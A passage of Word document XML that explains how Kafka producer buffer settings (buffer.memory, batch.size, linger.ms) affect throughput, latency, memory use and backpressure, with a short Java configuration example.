          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>small buffer</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> may quickly fill up, causing the producer to block or wait for space to become available in the buffer. This can </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>slow down message production</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if the producer is waiting for the broker to acknowledge messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2063102A" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14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e batch.size configuration also plays a role here: a large buffer allows Kafka to accumulate enough messages to fill the batch size and send them efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136FE9F0" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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essage Latency</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476E4506" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14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arger buffers</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> may introduce </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>higher latency</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because the producer will wait to fill up the buffer (up to a certain threshold) before sending messages in bulk. While this is efficient in terms of throughput, the trade-off is that there could be a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>delay</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in delivering individual messages, especially under low message volume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5AD0CB" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14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A smaller buffer size can lead to </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lower latency</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for individual messages because the producer doesn’t need to wait for many messages to accumulate before sending. However, this can hurt </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>overall throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and increase </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>network load</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7308DEE0" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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emory Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365B1D34" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14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A </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>larger buffer</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> increases the amount of memory the producer uses. If your system doesn’t have enough memory, a very large buffer can lead to </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>out-of-memory errors</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>system slowdowns</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607C2809" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14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oo large a buffer size could also cause </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resource contention</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, especially when running multiple producers on a system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1618BA70" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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locking and Buffer Overflow</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB51402" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14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If the buffer becomes full (i.e., the amount of data in the buffer exceeds the configured buffer.memory), the producer will block and </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wait for space to become available</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. This can negatively impact the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>producer’s performance</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and increase latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CD68D8" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14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Kafka also provides the max.block.ms configuration, which allows you to specify the maximum amount of time a producer will wait if the buffer is full. After this time, it will throw an exception if the buffer space is not freed up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013BF154" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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ackpressure Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A5C23C" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14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producer will apply </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>backpressure</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if the buffer is full, slowing down message production until space becomes available. This mechanism prevents producers from overwhelming the brokers, ensuring a steady flow of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391963C5" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14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he buffer size plays a key role in managing backpressure. A larger buffer gives the producer more room to handle bursts of high throughput without overwhelming the system, but it could also introduce </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>latency</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to longer waiting times to fill the buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E155835" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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mpact on Failures and Retries</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E5A25A" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14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If a network failure or a broker issue occurs and the producer fails to send messages, the producer will try to </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>retry</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sending the messages. A larger buffer provides the producer with more opportunity to retry sending messages before the buffer gets full.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9219E9" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148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However, if the buffer is too small, it could result in </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>frequent blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to space constraints, especially under high message rates or network issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF8B07F" w14:textId="77777777" w:rsidR="00495D8C"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D4420B5">
          <v:rect id="_x0000_i3193" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2597E276" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C"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 Producer Buffer Size Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED7991D" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148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uffer.memory</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Controls the total amount of memory available to the producer for buffering. If the buffer fills up, the producer will block or throw an exception, depending on the configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4019DBFB" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148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Default: 33554432 bytes (32 MB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B18FBFC" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148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ncreasing this value allows the producer to buffer more messages before they are sent to the broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4887B72E" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148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atch.size</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines the maximum size of a batch of messages to send to the broker. If the batch size is reached, the producer will send the batch regardless of whether the buffer is full.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198B483D" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148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Default: 16384 bytes (16 KB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5F0E8D" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148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A larger batch.size allows more messages to be batched together, improving throughput but possibly increasing latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBDE826" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148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inger.ms</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Defines how long the producer will wait to fill a batch before sending it to the broker. This introduces a trade-off between </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>latency</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throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7FEB19" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148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Default: 0 (send as soon as data is available)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426AEA22" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148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A higher value allows more messages to accumulate, increasing batch size and throughput but potentially increasing latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA50234" w14:textId="77777777" w:rsidR="00495D8C"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9A7C280">
          <v:rect id="_x0000_i3194" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4752554A" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C"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lastRenderedPageBreak/>
        <w:t>Example Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9ECDE7" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C"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sider a Kafka producer configured with the following settings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334DDE7A" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C"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erties props = new Properties();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5CB3B4" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C"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s.put("bootstrap.servers", "localhost:9092");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7866E1DF" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C"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s.put("acks", "all");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF40DEB" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C"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s.put("enable.idempotence", "true");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C6A50C" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C"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s.put("buffer.memory", 33554432); // 32MB buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB68B6E" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C"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s.put("batch.size", 16384); // 16KB batch size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F100580" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C"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s.put("linger.ms", 10); // Wait for up to 10ms to fill the batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AFFA29" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148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With a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>larger buffer size</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, the producer will be able to accumulate more messages before sending them, improving throughput but possibly introducing latency if the buffer isn't filled quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1CB7A1" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
